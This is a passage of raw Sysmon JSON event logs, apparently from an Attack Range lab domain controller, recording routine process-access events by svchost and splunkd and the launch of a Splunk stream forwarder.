C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3663,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3664,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3665,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.061\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.061","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6988|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3666,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.000\r\nProcessGuid: {A837DB8D-023E-5F25-0000-0010836D0500}\r\nProcessId: 4012\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\" --scheme\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.000","ProcessGuid":"{A837DB8D-023E-5F25-0000-0010836D0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\" --scheme","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=87264859EE7DE0CED006DBC0D061030F,SHA256=80087865D952613CBC7D9663B1F34B7264B1291278BDD5939C7CCEA334864CF1,IMPHASH=B0958DE096151B4209C7AECE2483DEF3","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3667,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 4232\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-023E-5F25-0000-0010836D0500}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"4232","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-023E-5F25-0000-0010836D0500}","TargetProcessId":"4012","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\streamfwd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3668,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3669,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:46.530\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:46.530","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
